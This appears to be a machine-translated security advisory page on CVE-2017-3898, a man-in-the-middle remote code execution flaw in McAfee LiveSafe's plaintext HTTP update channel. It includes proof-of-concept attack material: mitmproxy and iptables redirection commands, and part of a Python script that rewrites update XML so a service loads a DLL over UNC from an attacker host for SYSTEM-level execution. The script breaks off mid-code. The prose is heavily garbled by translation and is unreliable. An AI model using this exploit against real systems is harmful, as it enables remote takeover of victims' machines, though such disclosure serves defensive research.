Mccafé McAfee LiveSafe MiTM RCE Vulnerability CVE-2017-3898 research topic-vulnerability warning-the black bar safety net

2017-09-19T00:00:00
ID MYHACK58:62201789366
Type myhack58
Reporter 佚名
Modified 2017-09-19T00:00:00

Description

Vulnerability flaws bug overview The vulnerability flaws bugs affecting McAfee LiveSafe (MLS) 16.0.3 previous all version, the presence of the long-distance code to fulfill. This vulnerability flaws bug to allow the invasion of the attacker via the process of tampering with the HTTP after the end of the corresponding, which changes with the McAfee update the coherence of the Windows registry values. McAfee Security Scan Plus is a diagnostic object, you can reflect the computer of the anti-virus software, firewall and Web security software, while also scanning has been running French of intimidating. The vulnerability flaws of the bug by a Silent Signal the initial invention and delivery. Today has been announced the vulnerability flaws of the bug of the patch, the URL is: https://service.mcafee.com/webcenter/portal/cp/home/articleview it? articleId=TS102714 Vulnerability flaws bug before The invasion of the attacker can be in multiple McAfee products complete the long-distance code to fulfill. The affected product will be via a process of clear text HTTP channel, from http://COUNTRY. mcafee. com/apps/msc/webupdates/mscconfig. asp to retrieve the settings and equipment furnishings data where“COUNTRY”changes to the country's two-letter identifier, for example the UK.“uk”Chinese thing“cn” in. The corresponding comments including the XML pattern data, similar to the following: webservice-response response-version="1.0" frequency="168" verid="1#1316#15#0#2"> update> reg key="HKLM\SOFTWARE\McAfee\MSC\Settings\InProductTransaction" name="enable" type="REG_DWORD" value="1" obfuscate="0"/> update> webservice-response> In the above-mentioned, the description in the“webservice-response/update”contacts under the application of the reg flag to stop the registry change action. This is a sorrow begging to drop subsequent updates will take the initiative to trigger, the initial trigger is in the software device after a specific minutes after the acquiescence of the environment for 168 minutes. This update consists of McSvHost. exe process PlatformServiceFW. dll fulfillment, the approach is to apply the/update parameter misappropriation mcsvrcnt. exe French the. McSvHost. exe process the application by completing the registry changes mcsvrcnt. exe inherited the system of privileges in operation. Is the invasion an attacker is able to change-do Controller corresponding to the application system SYSTEM permissions to write to the specific registry. PoC We're able to use the vulnerability flaws of the bug, as acting to stop and change the plaintext HTTP pleadingly and accordingly. Because the software on HTTPS do will stop the validation of the certificate, is, so these connections are not Britain at the end changes the abnormal tension. Practice of HTTP acting form, it is possible via the application process--ignore mitmproxy of the Royal Decree line parameters to accomplish this:

mitmproxy-s mcreggeli_inline.py --ignore '.*' In the brightly lit acting form, should not be supplied to the above-mentioned parameters:

mitmproxy-s mreggeli_inline.py –T For the brightly lit acting form, can be applied in the following order, based on the Debian Linux published version is provided on equipment furnished NAT and port redirection, here eth0 is the purpose of the visible interface, eth1 is connected to the network:

"text-indent: 0em;">iptables-t nat-A PREROUTING-i eth0-p tcp \ --dport 80-j REDIRECT --to 8080 iptables-t nat-A POSTROUTING-o eth1-j MASQUERADE sysctl net. ipv4. ip_forward=1/p> The script will be in the begging of the URL to find the“mscconfig. asp”string. If the invention of XML, the corresponding annotation is deserialized, it will be based on in the script to open the first affirms that the reg variable, add a new reg node. REG variable is a dictionary list, each dictionary includes the following keys: Key: to change the registry entry of the title (for example“HKLM\SYSTEM\CurrentControlSet\Services\mfevtp”, where the backslashes need to stop the Python's original meaning; and Example: necessary for the creation of value paradigm(for example, the string“REG_SZ”); Title: necessary for the creation of the value of the title; Value: the necessary creation of value. The vulnerability flaws of the bug the application will also be the frequency of attribute changes to 1, so that, if necessary, again to penetrate the exudate, it is possible in a shorter period of time of 1 hour up to the stop. Pull a new node after the sequence of the natural object, and place it in the original corresponding to the annotation position. To demonstrate, let's cover the affected McAfee products, namely, mfevtp, McAfee process validation-do a-do terms-HKLM\SYSTEM\CurrentControlSet\Services\mfevtp, and its value is exchanged for the point with the point of the invasion to attack the host of UNC 门路参数的rundll32.exe the. Here, we apply Metasploit in smb_delivery module supply the payload test.dll to: ! REG variables affirms the following:

REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp", "type":"REG_SZ","name":"ImagePath", "value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},] As a result, from the new start the computer later, the system, SYSTEM-level order fulfillment will be triggered, and the McAfee software and without the invention of the environment exist. mcreggeli_inline.py

!/ usr/bin/env Python 3

HTTP proxy mode:

mitmproxy-s mcreggeli_inline.py --ignore '.*'

Transparent proxy mode:

mitmproxy-s mcreggeli_inline.py -T --host

from mitmproxy import ctx, http

from lxml import etree REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp","type":"REG_SZ","name":"ImagePath","value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},] def response(flow): if flow. request. scheme == "http" and "mscconfig. asp" in the flow. request. url: try: oxml=etree.XML(flow. response. content) oxml. set("frequency","1")

[1] [2] next